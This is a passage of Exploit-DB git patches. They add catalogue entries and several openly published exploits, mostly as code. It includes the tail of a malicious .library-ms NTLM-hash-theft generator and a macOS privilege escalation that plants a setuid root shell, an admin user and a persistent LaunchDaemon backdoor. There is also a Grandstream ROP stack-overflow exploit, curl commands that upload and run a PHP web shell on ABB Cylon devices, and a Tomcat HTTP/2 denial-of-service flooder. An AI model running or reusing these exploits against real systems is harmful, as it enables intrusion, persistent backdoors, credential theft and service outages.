Path(args.output) + output_dir.mkdir(parents=True, exist_ok=True) + + print(f"{Fore.CYAN}[*] Generating malicious .library-ms file...{Style.RESET_ALL}") + library_file = create_library_ms(args.ip, args.name, output_dir) + zip_file = output_dir / f"{args.name}.zip" + build_zip(library_file, zip_file) + + if not args.keep: + library_file.unlink() + print(f"{Fore.YELLOW}[-] Removed intermediate .library-ms file{Style.RESET_ALL}") + + print(f"{Fore.MAGENTA}[!] Done. Send ZIP to victim and listen for NTLM hash on your SMB server.{Style.RESET_ALL}") + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 29175d14f..aea095c41 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10794,6 +10794,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 46731,exploits/multiple/remote/46731.rb,"Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)",2019-04-19,Metasploit,remote,multiple,,2019-04-19,2019-04-19,1,CVE-2019-3396,Remote,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/confluence_widget_connector.rb 38905,exploits/multiple/remote/38905.rb,"Atlassian HipChat for Jira Plugin - Velocity Template Injection (Metasploit)",2015-12-08,Metasploit,remote,multiple,8080,2015-12-08,2015-12-08,1,CVE-2015-5603;OSVDB-126829,"Metasploit Framework (MSF)",,,,https://confluence.atlassian.com/jira/jira-and-hipchat-for-jira-plugin-security-advisory-2015-08-26-776650785.html 35898,exploits/multiple/remote/35898.php,"Atlassian JIRA 3.13.5 - File Download Security Bypass",2011-06-28,"Ignacio Garrido",remote,multiple,,2011-06-28,2015-01-26,1,,,,,,https://www.securityfocus.com/bid/48484/info +52309,exploits/multiple/remote/52309.txt,"Automic Agent 24.3.0 HF4 - Privilege Escalation",2025-05-29,"Flora Schäfer",remote,multiple,,2025-05-29,2025-05-29,0,CVE-2025-4971,,,,, 22296,exploits/multiple/remote/22296.txt,"Axis Communications HTTP Server 2.x - Messages Information Disclosure",2003-02-28,"Martin Eiszner",remote,multiple,,2003-02-28,2012-10-28,1,CVE-2003-1386;OSVDB-4806,,,,,https://www.securityfocus.com/bid/6980/info 43985,exploits/multiple/remote/43985.txt,"Axis Communications MPQT/PACS - Heap Overflow / Information Leakage",2017-11-30,bashis,remote,multiple,,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/9a1d3d165d7b32addf6d0a9ccf86626ee7e76093/Axis_Communications_MPQT_PACS_Heap_Overflow_and_information_leakage.txt 40125,exploits/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server-Side Include Daemon Remote Format String",2016-07-19,bashis,remote,multiple,,2016-07-19,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/53a2d49c1e4076e8559bb937f790e724fc52ca1d/axis-ssid-PoC.py @@ -10936,6 +10937,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 28210,exploits/multiple/remote/28210.txt,"FLV Players 8 - 'popup.php?url' Cross-Site Scripting",2006-07-12,xzerox,remote,multiple,,2006-07-12,2013-09-11,1,CVE-2006-3624;OSVDB-28644,,,,,https://www.securityfocus.com/bid/18954/info 36013,exploits/multiple/remote/36013.txt,"foomatic-gui python-foomatic 0.7.9.4 - 'pysmb.py' Arbitrary Shell Command Execution",2011-08-03,daveb,remote,multiple,,2011-08-03,2015-02-07,1,,,,,,https://www.securityfocus.com/bid/48982/info 39222,exploits/multiple/remote/39222.txt,"Foreman Smart-Proxy - Remote Command Injection",2014-06-05,"Lukas Zapletal",remote,multiple,,2014-06-05,2016-01-11,1,CVE-2014-0007;OSVDB-108277,,,,,https://www.securityfocus.com/bid/68117/info +52308,exploits/multiple/remote/52308.py,"Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass",2025-05-29,İbrahimsql,remote,multiple,,2025-05-29,2025-05-29,0,CVE-2024-0204,,,,, 23707,exploits/multiple/remote/23707.txt,"Freeform Interactive Purge 1.4.7/Purge Jihad 2.0.1 Game Client - Remote Buffer Overflow",2004-02-16,"Luigi Auriemma",remote,multiple,,2004-02-16,2012-12-31,1,CVE-2004-0290;OSVDB-3982,,,,,https://www.securityfocus.com/bid/9671/info 29873,exploits/multiple/remote/29873.php,"FreePBX 2.2 - SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,remote,multiple,,2007-04-20,2013-11-28,1,CVE-2007-2191;OSVDB-35315,,,,,https://www.securityfocus.com/bid/23575/info 47698,exploits/multiple/remote/47698.rb,"FreeSWITCH - Event Socket Command Execution (Metasploit)",2019-11-20,Metasploit,remote,multiple,,2019-11-20,2019-11-20,1,,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/misc/freeswitch_event_socket_cmd_exec.rb @@ -11532,6 +11534,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 27931,exploits/multiple/remote/27931.txt,"Snort 2.4.x - URIContent Rules Detection Evasion",2006-05-31,"Blake Hartstein",remote,multiple,,2006-05-31,2013-08-29,1,CVE-2006-2769;OSVDB-25837,,,,,https://www.securityfocus.com/bid/18200/info 21029,exploits/multiple/remote/21029.pl,"Softek MailMarshal 4 / Trend Micro ScanMail 1.0 - SMTP Attachment Protection Bypass",2001-07-25,"Aidan O'Kelly",remote,multiple,,2001-07-25,2012-09-03,1,OSVDB-88584;OSVDB-88583,,,,,https://www.securityfocus.com/bid/3097/info 16324,exploits/multiple/remote/16324.rb,"Solaris Sadmind - Command Execution (Metasploit)",2010-06-22,Metasploit,remote,multiple,,2010-06-22,2016-10-27,1,CVE-2003-0722;OSVDB-4585,"Metasploit Framework (MSF)",,,, +52311,exploits/multiple/remote/52311.py,"SolarWinds Serv-U 15.4.2 HF1 - Directory Traversal",2025-05-29,İbrahimsql,remote,multiple,,2025-05-29,2025-05-29,0,CVE-2024-28995,,,,, 36537,exploits/multiple/remote/36537.txt,"SonicWALL AntiSpam & EMail 7.3.1 - Multiple Vulnerabilities",2012-01-10,"Benjamin Kunz Mejri",remote,multiple,,2012-01-10,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/51337/info 31756,exploits/multiple/remote/31756.txt,"SonicWALL Email Security 6.1.1 - Error Page Cross-Site Scripting",2008-05-08,"Deniz Cevik",remote,multiple,,2008-05-08,2014-02-19,1,CVE-2008-2162;OSVDB-45017,,,,,https://www.securityfocus.com/bid/29107/info 24322,exploits/multiple/remote/24322.rb,"SonicWALL Gms 6 - Arbitrary File Upload (Metasploit)",2013-01-24,Metasploit,remote,multiple,,2013-01-24,2013-01-24,1,CVE-2013-1359;OSVDB-89347,"Metasploit Framework (MSF)",,,, @@ -11836,6 +11839,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48145,exploits/multiple/webapps/48145.py,"Cacti 1.2.8 - Unauthenticated Remote Code Execution",2020-02-03,Askar,webapps,multiple,,2020-02-27,2020-02-27,0,CVE-2020-8813,,,,,https://github.com/mhaskar/CVE-2020-8813/blob/dfb48378f39249ff54ecf24ccd3b89db26971ccf/Cacti-preauth-rce.py 52067,exploits/multiple/webapps/52067.txt,"Calibre-web 0.6.21 - Stored XSS",2024-08-23,"Catalin Iovita_ Alexandru Postolache",webapps,multiple,,2024-08-23,2024-08-23,0,,,,,, 18430,exploits/multiple/webapps/18430.txt,"Campaign Enterprise 11.0.421 - SQL Injection",2012-01-30,"Craig Freyman",webapps,multiple,,2012-01-30,2012-01-30,0,OSVDB-78888,,,,, +52312,exploits/multiple/webapps/52312.txt,"Campcodes Online Hospital Management System 1.0 - SQL Injection",2025-05-29,"Carine Constantino",webapps,multiple,,2025-05-29,2025-05-29,0,CVE-2025-5298,,,,, 18247,exploits/multiple/webapps/18247.txt,"Capexweb 1.1 - SQL Injection",2011-12-16,"D1rt3 Dud3",webapps,multiple,,2011-12-16,2011-12-16,1,OSVDB-77998;CVE-2011-5031,,,,, 50792,exploits/multiple/webapps/50792.go,"Casdoor 1.13.0 - SQL Injection (Unauthenticated)",2022-02-28,"Mayank Deshmukh",webapps,multiple,,2022-02-28,2022-02-28,0,CVE-2022-24124,,,,, 48553,exploits/multiple/webapps/48553.txt,"Cayin Content Management Server 11.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple,,2020-06-04,2020-06-04,0,,,,,, @@ -12504,6 +12508,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 52248,exploits/multiple/webapps/52248.txt,"WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection",2025-04-16,"Ivan Spiridonov",webapps,multiple,,2025-04-16,2025-04-16,0,CVE-2024-0399,,,,, 47690,exploits/multiple/webapps/47690.md,"WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts",2019-10-14,"Sebastian Neef",webapps,multiple,,2019-11-19,2019-11-19,0,CVE-2019-17671,,,,,https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/ 52285,exploits/multiple/webapps/52285.py,"WordPress Depicter Plugin 3.6.1 - SQL Injection",2025-05-09,"Andrew Long",webapps,multiple,,2025-05-09,2025-05-09,0,CVE-2025-2011,,,,,https://github.com/datagoboom/CVE-2025-2011 +52307,exploits/multiple/webapps/52307.txt,"WordPress Digits Plugin 8.4.6.1 - Authentication Bypass via OTP Bruteforcing",2025-05-29,"Saleh Tarawneh",webapps,multiple,,2025-05-29,2025-05-29,0,CVE-2025-4094,,,,, 52291,exploits/multiple/webapps/52291.py,"WordPress Frontend Login and Registration Blocks Plugin 1.0.7 - Privilege Escalation",2025-05-13,"Md Shoriful Islam",webapps,multiple,,2025-05-13,2025-05-13,0,CVE-2025-3605,,,,, 49189,exploits/multiple/webapps/49189.txt,"Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated)",2020-12-04,"Pankaj Verma",webapps,multiple,,2020-12-04,2020-12-04,0,CVE-2020-28976;CVE-2020-28977;CVE-2020-28978,,,,, 48919,exploits/multiple/webapps/48919.txt,"WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-20,n1x_,webapps,multiple,,2020-10-20,2020-10-20,0,,,,,, @@ -45941,6 +45946,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 16335,exploits/windows/remote/16335.rb,"WinComLPD 3.0.2 - Remote Buffer Overflow (Metasploit)",2010-06-22,Metasploit,remote,windows,,2010-06-22,2011-03-06,1,CVE-2008-5159;OSVDB-42861,"Metasploit Framework (MSF)",,,, 51575,exploits/windows/remote/51575.txt,"Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution",2023-07-07,nu11secur1ty,remote,windows,,2023-07-07,2023-07-07,0,CVE-2022-21907,,,,, 52300,exploits/windows/remote/52300.py,"Windows 2024.15 - Unauthenticated Desktop Screenshot Capture",2025-05-25,"Chokri Hammedi",remote,windows,,2025-05-25,2025-05-25,0,CVE-n/a,,,,, +52310,exploits/windows/remote/52310.py,"Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure",2025-05-29,"Mohammed Idrees Banyamer",remote,windows,,2025-05-29,2025-05-29,0,CVE-2025-24071,,,,, 30169,exploits/windows/remote/30169.txt,"WindowsPT 1.2 - User ID Key Spoofing",2007-06-11,nnposter,remote,windows,,2007-06-11,2013-12-10,1,CVE-2007-3201;OSVDB-41727,,,,,https://www.securityfocus.com/bid/24412/info 16529,exploits/windows/remote/16529.rb,"WinDVD7 - 'IASystemInfo.dll' ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,,2010-05-09,2011-03-10,1,CVE-2007-0348;OSVDB-34315,"Metasploit Framework (MSF)",,,, 7875,exploits/windows/remote/7875.pl,"WinFTP Server 2.3.0 - 'LIST' (Authenticated) Remote Buffer Overflow",2009-01-26,"joe walko",remote,windows,21,2009-01-25,2016-09-27,1,OSVDB-51667;CVE-2009-0351,,,,, From 2825165fedb56ce9947b8f220126f85194d972b4 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Fri, 6 Jun 2025 00:16:28 +0000 Subject: [PATCH 6/6] DB: 2025-06-06 7 changes to exploits/shellcodes/ghdb macOS LaunchDaemon iOS 17.2 - Privilege Escalation ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE) Apache Tomcat 10.1.39 - Denial of Service (DoS) Grandstream GSD3710 1.0.11.13 - Stack Overflow CloudClassroom PHP Project 1.0 - SQL Injection Microsoft Windows Server 2025 JScript Engine - Remote Code Execution (RCE) --- exploits/macos/local/52316.py | 100 ++++++++++++++++++++ exploits/multiple/remote/52313.py | 110 ++++++++++++++++++++++ exploits/multiple/remote/52317.txt | 97 +++++++++++++++++++ exploits/multiple/remote/52318.py | 143 +++++++++++++++++++++++++++++ exploits/php/webapps/52314.txt | 22 +++++ exploits/windows/remote/52315.py | 108 ++++++++++++++++++++++ files_exploits.csv | 6 ++ 7 files changed, 586 insertions(+) create mode 100755 exploits/macos/local/52316.py create mode 100755 exploits/multiple/remote/52313.py create mode 100644 exploits/multiple/remote/52317.txt create mode 100755 exploits/multiple/remote/52318.py create mode 100644 exploits/php/webapps/52314.txt create mode 100755 exploits/windows/remote/52315.py diff --git a/exploits/macos/local/52316.py b/exploits/macos/local/52316.py new file mode 100755 index 000000000..ef9b42ecf --- /dev/null +++ b/exploits/macos/local/52316.py @@ -0,0 +1,100 @@ +#!/usr/bin/env python3 +# Exploit Title: macOS LaunchDaemon iOS 17.2 - Privilege Escalation +# Author: Mohammed Idrees Banyamer (@banyamer_security) +# GitHub: https://github.com/mbanyamer +# Date: 2025-05-31 +# Tested on: macOS Sonoma (14.x ARM64 / x86_64) +# CVE: CVE-2025-24085 +# Type: Local Privilege Escalation +# Platform: macOS +# Author Country: Jordan +# Description: +# This local privilege escalation exploit leverages a vulnerable macOS LaunchDaemon plist configuration to execute +# arbitrary commands with root privileges. The exploit creates a root payload script that adds a root shell binary, +# creates an admin user, and installs a persistent LaunchDaemon backdoor for root access. It hijacks the +# com.apple.securemonitor LaunchDaemon plist to trigger the payload, allowing unauthorized escalation to root +# on macOS Sonoma systems. + +import os +import plistlib +import time +from pathlib import Path + +LAUNCHD_PLIST = "/Library/LaunchDaemons/com.apple.securemonitor.plist" +PAYLOAD_SCRIPT = "/tmp/.macroot_payload.sh" + +def create_payload(): + print("[+] Creating root payload script...") + payload = """#!/bin/bash +# Root shell +cp /bin/bash /tmp/.rootbash +chmod +s /tmp/.rootbash +chown root:wheel /tmp/.rootbash + +# Add admin user +sysadminctl -addUser pentest -password macOS123! -admin + +# Log file +echo "[+] Root backdoor triggered at $(date)" >> /tmp/.rootlog + +# Persistent backdoor +cat < /Library/LaunchDaemons/com.apple.backdoor.plist + + + + + Labelcom.apple.backdoor + ProgramArguments/tmp/.rootbash + RunAtLoad + + +EOF +chmod 644 /Library/LaunchDaemons/com.apple.backdoor.plist +chown root:wheel /Library/LaunchDaemons/com.apple.backdoor.plist +""" + with open(PAYLOAD_SCRIPT, "w") as f: + f.write(payload) + os.chmod(PAYLOAD_SCRIPT, 0o755) + +def hijack_launchdaemon(): + print("[+] Hijacking LaunchDaemon plist...") + if not Path(LAUNCHD_PLIST).exists(): + # create a fake one + print("[*] Creating fake LaunchDaemon plist for exploitation...") + plist_data = { + 'Label': 'com.apple.securemonitor', + 'ProgramArguments': [PAYLOAD_SCRIPT], + 'RunAtLoad': True, + } + with open(LAUNCHD_PLIST, "wb") as f: + plistlib.dump(plist_data, f) + else: + # hijack existing one + with open(LAUNCHD_PLIST, 'rb') as f: + plist = plistlib.load(f) + plist['ProgramArguments'] = [PAYLOAD_SCRIPT] + plist['RunAtLoad'] = True + with open(LAUNCHD_PLIST, 'wb') as f: + plistlib.dump(plist, f) + + os.system(f"chmod 644 {LAUNCHD_PLIST}") + os.system(f"chown root:wheel {LAUNCHD_PLIST}") + +def trigger_payload(): + print("[+] Triggering LaunchDaemon manually...") + os.system(f"sudo launchctl load -w {LAUNCHD_PLIST}") + print("[+] Done. You can now execute /tmp/.rootbash -p for root shell") + +def main(): + if os.geteuid() == 0: + print("[!] You are already root. No need to exploit.") + return + create_payload() + hijack_launchdaemon() + print("[+] Exploit completed. Reboot or run manually:") + print(f" sudo launchctl load -w {LAUNCHD_PLIST}") + print(" Then run: /tmp/.rootbash -p") + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/multiple/remote/52313.py b/exploits/multiple/remote/52313.py new file mode 100755 index 000000000..ca43d91cd --- /dev/null +++ b/exploits/multiple/remote/52313.py @@ -0,0 +1,110 @@ +#!/usr/bin/env python3 + +# Exploit Title: Grandstream GSD3710 1.0.11.13 - Stack Overflow +# Date: 2025-05-29 +# Exploit Author: Pepelux +# Vendor Homepage: https://www.grandstream.com/ +# Version: Grandstream GSD3710 - firmware:1.0.11.13 and lower +# Tested on: Linux and MacOS +# CVE: CVE-2022-2025 + +""" +Author: Jose Luis Verdeguer (@pepeluxx) + +Required: Pwntools + +Example: + +$ python 3 CVE-2022-2025.py -i DEVICE_IP -u USER -p PASSWORD +""" + + +from struct import pack +import sys +from time import sleep +import argparse +from pwn import * + + +def get_args(): + parser = argparse.ArgumentParser( + formatter_class=lambda prog: argparse.RawDescriptionHelpFormatter( + prog, max_help_position=50)) + + # Add arguments + parser.add_argument('-i', '--ip', type=str, required=True, + help='device IP address', dest="ip") + parser.add_argument('-u', '--user', type=str, required=True, + help='username', dest="user") + parser.add_argument('-p', '--pass', type=str, required=True, + help='password', dest="pwd") + + # Array for all arguments passed to script + args = parser.parse_args() + + try: + ip = args.ip + user = args.user + pwd = args.pwd + + return ip, user, pwd + except ValueError: + exit() + +def check_badchars(payload): + for i in range(5, len(payload)): + if payload[i] in [0xd, 0xa, 0x3b, 0x7c, 0x20]: + log.warn("Badchar %s detected at %#x" % (hex(payload[i]), i)) + return True + return False + + +def main(): + ip, user, pwd = get_args() + + libc_base = 0x76bb8000 + gadget = libc_base + 0x5952C # 0x0005952c: pop {r0, r4, pc}; + bin_sh = libc_base + 0xCEA9C # /bin/sh + system = libc_base + 0x2C7FD # 0x0002c7fd # system@libc + exit = libc_base + 0x2660C + + print("[*] Libc base: %#x" % libc_base) + print("[*] ROP gadget: %#x" % gadget) + print("[*] /bin/sh: %#x" % bin_sh) + print("[*] system: %#x" % system) + print("[*] exit: %#x\n" % exit) + + padding = b"A" * 320 + + payload = b'ping ' + payload += padding + payload += p32(gadget) + payload += p32(bin_sh) + payload += b"AAAA" + payload += p32(system) + payload += p32(exit) + + if check_badchars(payload): + sys.exit(0) + + count = 1 + + while True: + print('Try: %d' % count) + s = ssh(user, ip, 22, pwd) + p = s.shell(tty=False) + print(p.readuntil(b"GDS3710> ")) + p.sendline(payload) + p.sendline(b"id") + sleep(1) + data = p.read() + if str(data).find('root') > -1: + print('PWNED!') + p.interactive() + s.close() + sys.exit() + s.close() + count += 1 + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/multiple/remote/52317.txt b/exploits/multiple/remote/52317.txt new file mode 100644 index 000000000..2bad6e819 --- /dev/null +++ b/exploits/multiple/remote/52317.txt @@ -0,0 +1,97 @@ +ABB Cylon Aspect 3.08.04 DeploySource - Remote Code Execution (RCE) + + +Vendor: ABB Ltd. +Product web page: https://www.global.abb +Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio + Firmware: <=3.08.04 + +Summary: ASPECT is an award-winning scalable building energy management +and control solution designed to allow users seamless access to their +building data through standard building protocols including smart devices. + +Desc: ABB Cylon Aspect BMS/BAS is vulnerable to a critical flaw in the +AuthenticatedHttpServlet within its application server, enabling +remote attackers to bypass authentication by setting the Host: +127.0.0.1 header. This deceives the server into processing requests +as if they originate from localhost, granting unauthorized access +to privileged operations. This bypass grants access to privileged +functionality, including the DeploymentServlet, which is vulnerable +to directory traversal. By leveraging this, an attacker can write +arbitrary PHP files outside the intended directory scope. When combined, +these issues allow remote attackers to upload a malicious PHP shell +and execute system commands with the privileges of the web server, +leading to full system compromise. + +Tested on: GNU/Linux 3.15.10 (armv7l) + GNU/Linux 3.10.0 (x86_64) + GNU/Linux 2.6.32 (x86_64) + Intel(R) Atom(TM) Processor E3930 @ 1.30GHz + Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz + PHP/7.3.11 + PHP/5.6.30 + PHP/5.4.16 + PHP/4.4.8 + PHP/5.3.3 + AspectFT Automation Application Server + lighttpd/1.4.32 + lighttpd/1.4.18 + Apache/2.2.15 (CentOS) + OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) + OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) + ErgoTech MIX Deployment Server 2.0.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2025-5954 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5954.php + + +21.04.2024 + +-- + + +$ cat project + + P R O J E C T + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ + + +$ curl "http://192.168.73.31:7226/servlets/DeploymentServlet\ +> ?RequestType=DeploySource\ +> &filename=../../../home/MIX_CMIX/htmlroot/zsl.php\ +> &directory=/" \ +> --data-binary @zsl.php \ +> -H "Host: 127.0.0.1" \ +> -H "Content-Type: application/octet-stream" +200 Successful200 Successful + +$ curl http://192.168.73.31/zsl.php?cmd=id;ls -al zsl.php +uid=48(apache) gid=48(apache) groups=48(apache),0(root) context=system_u:system_r:httpd_t:s0 +-rw-r--r--. 1 root root 106 Jun 4 13:29 zsl.php \ No newline at end of file diff --git a/exploits/multiple/remote/52318.py b/exploits/multiple/remote/52318.py new file mode 100755 index 000000000..8d14e4a5f --- /dev/null +++ b/exploits/multiple/remote/52318.py @@ -0,0 +1,143 @@ +# Exploit Title: Apache Tomcat 10.1.39 - Denial of Service (DOS) +# Author: Abdualhadi khalifa +# CVE: CVE-2025-31650 + +import httpx +import asyncio +import random +import urllib.parse +import sys +import socket +from colorama import init, Fore, Style + +init() + +class TomcatKiller: + def __init__(self): + self.success_count = 0 + self.error_count = 0 + self.invalid_priorities = [ + \\\"u=-1, q=2\\\", + \\\"u=4294967295, q=-1\\\", + \\\"u=-2147483648, q=1.5\\\", + \\\"u=0, q=invalid\\\", + \\\"u=1/0, q=NaN\\\", + \\\"u=1, q=2, invalid=param\\\", + \\\"\\\", + \\\"u=1, q=1, u=2\\\", + \\\"u=99999999999999999999, q=0\\\", + \\\"u=-99999999999999999999, q=0\\\", + \\\"u=, q=\\\", + \\\"u=1, q=1, malformed\\\", + \\\"u=1, q=, invalid\\\", + \\\"u=-1, q=4294967295\\\", + \\\"u=invalid, q=1\\\", + \\\"u=1, q=1, extra=\\\", + \\\"u=1, q=1; malformed\\\", + \\\"u=1, q=1, =invalid\\\", + \\\"u=0, q=0, stream=invalid\\\", + \\\"u=1, q=1, priority=recursive\\\", + \\\"u=1, q=1, %invalid%\\\", + \\\"u=0, q=0, null=0\\\", + ] + + async def validate_url(self, url): + try: + parsed_url = urllib.parse.urlparse(url) + if not parsed_url.scheme or not parsed_url.hostname: + raise ValueError(\\\"Invalid URL format. Use http:// or https://\\\") + host = parsed_url.hostname + port = parsed_url.port if parsed_url.port else (443 if parsed_url.scheme == \\\'https\\\' else 80) + return host, port + except Exception: + print(f\\\"{Fore.RED}Error: Invalid URL. Use http:// or https:// format.{Style.RESET_ALL}\\\") + sys.exit(1) + + async def check_http2_support(self, host, port): + async with httpx.AsyncClient(http2=True, verify=False, timeout=5, limits=httpx.Limits(max_connections=1000)) as client: + try: + response = await client.get(f\\\"https://{host}:{port}/\\\", headers={\\\"user-agent\\\": \\\"TomcatKiller\\\"}) + if response.http_version == \\\"HTTP/2\\\": + print(f\\\"{Fore.GREEN}HTTP/2 supported! Proceeding ...{Style.RESET_ALL}\\\") + return True + else: + print(f\\\"{Fore.YELLOW}Error: HTTP/2 not supported. This exploit requires HTTP/2.{Style.RESET_ALL}\\\") + return False + except Exception: + print(f\\\"{Fore.RED}Error: Could not connect to {host}:{port}.{Style.RESET_ALL}\\\") + return False + + async def send_invalid_priority_request(self, host, port, num_requests, task_id): + async with httpx.AsyncClient(http2=True, verify=False, timeout=0.3, limits=httpx.Limits(max_connections=1000)) as client: + url = f\\\"https://{host}:{port}/\\\" + for i in range(num_requests): + headers = { + \\\"priority\\\": random.choice(self.invalid_priorities), + \\\"user-agent\\\": f\\\"TomcatKiller-{task_id}-{random.randint(1, 1000000)}\\\", + \\\"cache-control\\\": \\\"no-cache\\\", + \\\"accept\\\": f\\\"*/*; q={random.random()}\\\", + } + try: + await client.get(url, headers=headers) + self.success_count += 1 + except Exception: + self.error_count += 1 + + async def monitor_server(self, host, port): + while True: + try: + with socket.create_connection((host, port), timeout=2): + print(f\\\"{Fore.YELLOW}Target {host}:{port} is reachable.{Style.RESET_ALL}\\\") + except Exception: + print(f\\\"{Fore.RED}Target {host}:{port} unreachable or crashed!{Style.RESET_ALL}\\\") + break + await asyncio.sleep(2) + + async def run_attack(self, host, port, num_tasks, requests_per_task): + print(f\\\"{Fore.GREEN}Starting attack on {host}:{port}...{Style.RESET_ALL}\\\") + print(f\\\"Tasks: {num_tasks}, Requests per task: {requests_per_task}\\\") + print(f\\\"{Fore.YELLOW}Monitor memory manually via VisualVM or check catalina.out for OutOfMemoryError.{Style.RESET_ALL}\\\") + + monitor_task = asyncio.create_task(self.monitor_server(host, port)) + tasks = [self.send_invalid_priority_request(host, port, requests_per_task, i) for i in range(num_tasks)] + await asyncio.gather(*tasks) + monitor_task.cancel() + + total_requests = num_tasks * requests_per_task + success_rate = (self.success_count / total_requests * 100) if total_requests > 0 else 0 + print(f\\\"\\\\n{Fore.MAGENTA}===== Attack Summary ====={Style.RESET_ALL}\\\") + print(f\\\"Target: {host}:{port}\\\") + print(f\\\"Total Requests: {total_requests}\\\") + print(f\\\"Successful Requests: {self.success_count}\\\") + print(f\\\"Failed Requests: {self.error_count}\\\") + print(f\\\"Success Rate: {success_rate:.2f}%\\\") + print(f\\\"{Fore.MAGENTA}========================={Style.RESET_ALL}\\\") + +async def main(): + print(f\\\"{Fore.BLUE}===== TomcatKiller - CVE-2025-31650 ====={Style.RESET_ALL}\\\") + print(f\\\"Developed by: @absholi7ly\\\") + print(f\\\"Exploits memory leak in Apache Tomcat (10.1.10-10.1.39) via invalid HTTP/2 priority headers.\\\") + print(f\\\"{Fore.YELLOW}Warning: For authorized testing only. Ensure HTTP/2 and vulnerable Tomcat version.{Style.RESET_ALL}\\\\n\\\") + + url = input(f\\\"{Fore.CYAN}Enter target URL (e.g., https://localhost:8443): {Style.RESET_ALL}\\\") + num_tasks = int(input(f\\\"{Fore.CYAN}Enter number of tasks (default 300): {Style.RESET_ALL}\\\") or 300) + requests_per_task = int(input(f\\\"{Fore.CYAN}Enter requests per task (default 100000): {Style.RESET_ALL}\\\") or 100000) + + tk = TomcatKiller() + host, port = await tk.validate_url(url) + + if not await tk.check_http2_support(host, port): + sys.exit(1) + + await tk.run_attack(host, port, num_tasks, requests_per_task) + +if __name__ == \\\"__main__\\\": + try: + asyncio.run(main()) + print(f\\\"{Fore.GREEN}Attack completed!{Style.RESET_ALL}\\\") + except KeyboardInterrupt: + print(f\\\"{Fore.YELLOW}Attack interrupted by user.{Style.RESET_ALL}\\\") + sys.exit(0) + except Exception as e: + print(f\\\"{Fore.RED}Unexpected error: {e}{Style.RESET_ALL}\\\") + sys.exit(1) \ No newline at end of file diff --git a/exploits/php/webapps/52314.txt b/exploits/php/webapps/52314.txt new file mode 100644 index 000000000..781699860 --- /dev/null +++ 